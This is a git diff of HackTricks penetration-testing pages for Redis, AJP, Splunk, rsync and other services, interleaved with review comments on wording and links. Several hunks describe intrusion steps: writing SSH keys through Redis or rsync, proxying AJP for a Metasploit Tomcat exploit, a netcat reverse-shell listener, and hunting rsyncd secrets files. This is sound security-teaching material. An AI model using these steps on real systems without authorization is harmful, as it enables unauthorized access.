diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index 1d78df4b2..498730796 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -31,7 +31,9 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker (from [here](https://redis.io/topics/introduction)). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). +From [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker). + +By default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). **Default port:** 6379 @@ -92,7 +94,7 @@ AUTH ### **Authenticated enumeration** -If the Redis instance is accepting **anonymous** connections or you found some **valid credentials**, you can **start enumerating** the service with the following commands: +If the Redis server permits **anonymous connections** or if you have obtained valid credentials, you can initiate the enumeration process for the service using the following **commands**: ```bash INFO 
@@ -103,7 +105,8 @@ CONFIG GET * [ ... Get config ... ] ``` -**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.**\ +**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.** + Note that the **Redis commands of an instance can be renamed** or removed in the _redis.conf_ file. For example this line will remove the command FLUSHDB: ``` @@ -223,6 +226,8 @@ Note that **several template engines cache** the templates in **memory**, so eve ### SSH +Example [from here](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) + Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** (usually _/var/lib/redis_ or _/home/redis/.ssh_), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: 1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`** diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 1751bb1d6..48655aba4 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md 
@@ -66,46 +66,6 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ## AJP Proxy -### Apache AJP Proxy - -It’s not often that you encounter port 8009 open and no other web port open. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary. - -```bash -sudo apt-get install libapache2-mod-jk -sudo vim /etc/apache2/apache2.conf # append the following line to the config - Include ajp.conf -sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address - ProxyRequests Off - - Order deny,allow - Deny from all - Allow from localhost - - ProxyPass / ajp://HOST:8009/ - ProxyPassReverse / ajp://HOST:8009/ -sudo a2enmod proxy_http -sudo a2enmod proxy_ajp -sudo systemctl restart apache2 -``` - -A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. 
Here is the metasploit output also: - -```bash -msf exploit(tomcat_mgr_deploy) > show options - -Module options (exploit/multi/http/tomcat_mgr_deploy): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - PASSWORD tomcat no The password for the specified username - PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) - Proxies no Use a proxy chain - RHOST localhost yes The target address - RPORT 80 yes The target port - USERNAME tomcat no The username to authenticate as - VHOST no HTTP server virtual host -``` - ### Nginx Reverse Proxy & AJP [Checkout the Dockerized version](#Dockerized-version) @@ -184,7 +144,7 @@ curl http://127.0.0.1:80 ``` -### Dockerized-version +### Nginx Dockerized-version ```bash git clone https://github.com/ScribblerCoder/nginx-ajp-docker 
@@ -196,9 +156,36 @@ docker build . -t nginx-ajp-proxy docker run -it --rm -p 80:80 nginx-ajp-proxy ``` +### Apache AJP Proxy + +Encountering an open port 8009 without any other accessible web ports is rare. However, it is still possible to exploit it using **Metasploit**. By leveraging **Apache** as a proxy, requests can be redirected to **Tomcat** on port 8009. + +```bash +sudo apt-get install libapache2-mod-jk +sudo vim /etc/apache2/apache2.conf # append the following line to the config + Include ajp.conf +sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address + ProxyRequests Off + + Order deny,allow + Deny from all + Allow from localhost + + ProxyPass / ajp://HOST:8009/ + ProxyPassReverse / ajp://HOST:8009/ +sudo a2enmod proxy_http +sudo a2enmod proxy_ajp +sudo systemctl restart apache2 +``` + +This setup offers the potential to bypass intrusion detection and prevention systems (IDS/IPS) due to the **AJP protocol's binary nature**, although this capability has not been verified. By directing a regular Metasploit Tomcat exploit to `127.0.0.1:80`, you can effectively seize control of the targeted system. + +```bash +msf exploit(tomcat_mgr_deploy) > show options +``` ## References - +* [https://github.com/yaoweibin/nginx_ajp_module](https://github.com/yaoweibin/nginx_ajp_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md index c4887faf9..c0458ade7 100644 --- a/network-services-pentesting/8086-pentesting-influxdb.md +++ b/network-services-pentesting/8086-pentesting-influxdb.md 
@@ -24,11 +24,7 @@ Other ways to support HackTricks: ## Basic Information -**InfluxDB** is an open-source **time series database** (TSDB) developed by the company InfluxData. - -A **time series database (TSDB)** is a software system that is optimized for storing and **serving time series** through associated pairs of time(s) and value(s). - -Time series datasets are **relatively large and uniform compared to other datasets**―usually being composed of a timestamp and associated data. Time series datasets can also have fewer relationships between data entries in different tables and don't require indefinite storage of entries. The unique properties of time series datasets mean that time series databases can provide **significant improvements in storage space and performance over general purpose databases**. For instance, due to the uniformity of time series data, **specialized compression algorithms** can provide improvements over regular compression algorithms designed to work on less uniform data. Time series databases can also be **configured to regularly delete old data**, unlike regular databases which are designed to store data indefinitely. Special database indices can also provide boosts in query performance. (From [here](https://en.wikipedia.org/wiki/Time\_series\_database)). +**InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance. **Default port**: 8086 
@@ -65,7 +61,7 @@ The information of this example was taken from [**here**](https://oznetnerd.com/ #### Show databases -The found databases are _telegraf_ and _\_internal_ (you will find this one everywhere) +The found databases are `telegraf` and `internal` (you will find this one everywhere) ```bash > show databases diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 1fb39ee41..9ba2149d3 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -16,8 +16,9 @@ Other ways to support HackTricks: ## **Basic Information** -**Splunk** is a **log analytics tool** used to gather, analyze and visualize data. Though not originally intended to be a SIEM tool, Splunk is often used for **security monitoring and business analytics**. Splunk deployments are often used to house **sensitive data** and could provide a wealth of information for an attacker if compromised. +Splunk is a **log analytics tool** that plays a crucial role in **gathering, analyzing, and visualizing data**. While its initial purpose was not to serve as a **SIEM (Security Information and Event Management)** tool, it has gained popularity in the realm of **security monitoring** and **business analytics**. +Splunk deployments are frequently utilized to store **sensitive data** and can serve as a **valuable source of information** for potential attackers if they manage to compromise the system. **Default port:** 8089 ``` 
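Review bot: the InfluxDB "Show databases" hunk drops the leading underscore from the system database name: the old text `_\_internal_` rendered as `_internal` (italic), but the replacement reads `` `internal` ``. The database InfluxDB creates is `_internal`, and the `show databases` output quoted directly below this line shows that name, so the new sentence now contradicts the listing it introduces. Suggest `` The found databases are `telegraf` and `_internal` (you will find this one everywhere) ``.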
@@ -106,7 +107,7 @@ sudo nc -lnvp 443 listening on [any] 443 ... ``` -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. \*\*\*\* As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. +On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. #### Linux diff --git a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md index 403862f8e..26e599869 100644 --- a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md +++ b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md 
@@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
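Review bot: since this footer line is being touched in several files in this commit (here and in the integer-overflow, http-connection-request-smuggling and the later bitcoin hunk), it is worth fixing the link text at the same time: the visible handle is `@carlospolopm` but the URL is `https://twitter.com/hacktricks_live`. Either the handle or the URL is stale; aligning them in one pass is cheaper than another footer-only commit.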
@@ -65,7 +65,7 @@ PORT STATE SERVICE * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/873-pentesting-rsync.md b/network-services-pentesting/873-pentesting-rsync.md index c4e779572..92f4fb6f0 100644 --- a/network-services-pentesting/873-pentesting-rsync.md +++ b/network-services-pentesting/873-pentesting-rsync.md 
@@ -16,9 +16,9 @@ Other ways to support HackTricks: ## **Basic Information** -> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. +From [wikipedia](https://en.wikipedia.org/wiki/Rsync): -From [wikipedia](https://en.wikipedia.org/wiki/Rsync). 
+> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. **Default port:** 873 
@@ -53,47 +53,44 @@ raidroot @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password ``` -### **Enumerate shared folders** +### **Enumerating Shared Folders** -**An rsync module is essentially a directory share**. These modules **can optionally be protected by a password**. This options lists the available modules and, optionally, determines if the module requires a password to access: +**Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used: ```bash nmap -sV --script "rsync-list-modules" -p msf> use auxiliary/scanner/rsync/modules_list -#Example using IPv6 and a different port +# Example with IPv6 and alternate port rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 ``` -Notice that it could be configured a shared name to not be listed. So there could be something **hidden**.\ -Notice that it may be some **shared names** being listed where you need some (different) **credentials** to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those. +Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message. -### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#rsync) +### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync) -### Manual Rsync +### Manual Rsync Usage -Once you have the **list of modules** you have a few different options depending on the actions you want to take and whether or not authentication is required. **If authentication is not required** you can **list** a shared folder: +Upon obtaining a **module list**, actions depend on whether authentication is needed. 
Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through: ```bash +# Listing a shared folder rsync -av --list-only rsync://192.168.0.123/shared_name -``` -And **copy** all **files** to your local machine via the following command: - -```bash +# Copying files from a shared folder rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared ``` -This **recursively transfers all files from the directory** `` on the machine ``into the `./rsync_shared` directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer. +This process **recursively transfers files**, preserving their attributes and permissions. -If you **have credentials** you can **list/download** a **shared name** using (the password will be prompted): +With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: ```bash rsync -av --list-only rsync://username@192.168.0.123/shared_name rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared ``` -You could also **upload** some **content** using rsync (for example, in this case we can upload an _**authorized\_keys**_ file to obtain access to the box): +To **upload content**, such as an _**authorized_keys**_ file for access, use: ```bash rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh 
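Review bot: the rewritten warning "some shares might not appear in the list, possibly hiding them" loses the concrete point of the original, which was that a module can be deliberately configured not to be listed (the `list = no` module option in `rsyncd.conf`), so an empty or short listing does not mean there are no modules. Suggest keeping that detail, e.g. "Modules can be configured not to be listed (`list = no`), so the listing may be incomplete; some listed modules also need different credentials and return `Access Denied`." Separately, merging the two commands into one block makes a pre-existing inconsistency stand out: the listing uses the default port (`rsync://192.168.0.123/shared_name`) while the copy right after it uses `:8730`; pick one host/port pair for the example, and note that `./rsyn_shared` is presumably meant to be `./rsync_shared`.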
@@ -101,13 +98,17 @@ rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh ## POST -Find the rsyncd configuration file: +To locate the rsyncd configuration file, execute: ```bash find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) ``` -Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd. +Within this file, a _secrets file_ parameter might point to a file containing **usernames and passwords** for rsyncd authentication. + + +## References +* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
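Review bot: the rewritten sentence drops the literal parameter syntax `secrets file = /path/to/file`, which is exactly what a reader wants to grep for in `rsyncd.conf`; keep it in backticks. The `find /etc` command on this hunk will also spew permission errors when run as an unprivileged user, so `2>/dev/null` belongs on the end. Adding the References section is good and matches the convention introduced elsewhere in this commit.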
diff --git a/network-services-pentesting/9001-pentesting-hsqldb.md b/network-services-pentesting/9001-pentesting-hsqldb.md index 06288a5bd..4eeac1b0f 100644 --- a/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/network-services-pentesting/9001-pentesting-hsqldb.md @@ -17,7 +17,7 @@ Other ways to support HackTricks: # Basic Information -HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. +**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. **Default port:** 9001 diff --git a/network-services-pentesting/9100-pjl.md b/network-services-pentesting/9100-pjl.md index 7240eff64..dd21f326a 100644 --- a/network-services-pentesting/9100-pjl.md +++ b/network-services-pentesting/9100-pjl.md 
@@ -17,9 +17,9 @@ Other ways to support HackTricks: # Basic Information -Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. (From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing)) +From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. 
Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. -If you want to learn more about [**hacking printers read this page**](pentesting-printers/). +If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). **Default port:** 9100 @@ -71,10 +71,6 @@ This is the tool you want to use to abuse printers: {% embed url="https://github.com/RUB-NDS/PRET" %} -## Hacking Printers best reference - -{% embed url="https://hacking-printers.net/wiki/index.php/File_system_access" %} - # **Shodan** * `pjl port:9100` diff --git a/network-services-pentesting/9200-pentesting-elasticsearch.md b/network-services-pentesting/9200-pentesting-elasticsearch.md index 74263d8f9..a1414ee53 100644 --- a/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/network-services-pentesting/9200-pentesting-elasticsearch.md 
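Review bot: in the 9100-pjl.md hunks, the internal link `pentesting-printers/` is replaced with the external wiki main page and the `File_system_access` embed under "Hacking Printers best reference" is deleted outright. If the internal `pentesting-printers/` page still exists, the internal link should stay (it is what the rest of the book links to); if it was removed, the `https://hacking-printers.net/wiki/index.php/File_system_access` link should move into a `## References` section, as the other files in this commit do, rather than disappear, since it is the only pointer to the file-system-access technique.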
@@ -16,17 +16,15 @@ Other ways to support HackTricks: ## Basic information -From the [main page](https://www.elastic.co/what-is/elasticsearch) you can find some useful descriptions: - -> Elasticsearch is a distributed, open source search and analytics engine for all types of data, including textual, numerical, geospatial, structured, and unstructured. Elasticsearch is built on Apache Lucene and was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Known for its simple REST APIs, distributed nature, speed, and scalability, Elasticsearch is the central component of the Elastic Stack, a set of open source tools for data ingestion, enrichment, storage, analysis, and visualization. Commonly referred to as the ELK Stack (after Elasticsearch, Logstash, and Kibana), the Elastic Stack now includes a rich collection of lightweight shipping agents known as Beats for sending data to Elasticsearch. +Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats. ### What is an Elasticsearch index? -An Elasticsearch _index_ **is a collection of documents** that are related to each other. Elasticsearch stores data as JSON documents. Each document correlates a set of _keys_ (names of fields or properties) with their corresponding values (strings, numbers, Booleans, dates, arrays of _values_, geolocations, or other types of data). +An Elasticsearch **index** is a collection of **related documents** stored as **JSON**. 
Each document consists of **keys** and their corresponding **values** (strings, numbers, booleans, dates, arrays, geolocations, etc.). -Elasticsearch uses a data structure called an _inverted index_, which is designed to allow very fast full-text searches. An inverted index lists every unique word that appears in any document and identifies all of the documents each word occurs in. +Elasticsearch uses an efficient data structure called an **inverted index** to facilitate fast full-text searches. This index lists every unique word in the documents and identifies the documents in which each word appears. -During the indexing process, Elasticsearch stores documents and builds an inverted index to make the document data searchable in near real-time. Indexing is initiated with the index API, through which you can add or update a JSON document in a specific index. +During the indexing process, Elasticsearch stores the documents and constructs the inverted index, allowing for near real-time searching. The **index API** is used to add or update JSON documents within a specific index. **Default port**: 9200/tcp diff --git a/network-services-pentesting/pentesting-modbus.md b/network-services-pentesting/pentesting-modbus.md index a70a93707..0c3e91593 100644 --- a/network-services-pentesting/pentesting-modbus.md +++ b/network-services-pentesting/pentesting-modbus.md @@ -17,7 +17,7 @@ Other ways to support HackTricks: # Basic Information -Modbus Protocol is a messaging structure developed by Modicon in 1979. It is used to establish master-slave/client-server communication between intelligent devices. +In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently. **Default port:** 502 
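Review bot: the Modbus rewrite pads a one-line definition with filler: "This protocol plays a crucial role in enabling devices to exchange data efficiently" says nothing the first sentence does not, and "serving as a messaging structure" is weaker than the original "is a messaging structure". Suggest keeping the original two sentences, possibly with the bolding added. In the Elasticsearch hunk above it, removing "From the main page ..." also removes the only attribution for text that is still a near-verbatim paraphrase of the vendor page; keep the source link, in the same "From [here](...)" form the 9100-pjl.md hunk uses.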
diff --git a/pentesting-web/http-connection-request-smuggling.md b/pentesting-web/http-connection-request-smuggling.md index 1f0d638e7..232731022 100644 --- a/pentesting-web/http-connection-request-smuggling.md +++ b/pentesting-web/http-connection-request-smuggling.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -56,7 +56,7 @@ To identify these vulnerabilities, the 'connection-state probe' feature in HTTP * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/integer-overflow.md b/pentesting-web/integer-overflow.md index 9c8c9f409..358ac6ae4 100644 --- a/pentesting-web/integer-overflow.md +++ b/pentesting-web/integer-overflow.md 
@@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. 
@@ -57,7 +57,7 @@ int main() { * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md index bce575bed..571ba81e7 100644 --- a/pentesting-web/parameter-pollution.md +++ b/pentesting-web/parameter-pollution.md 
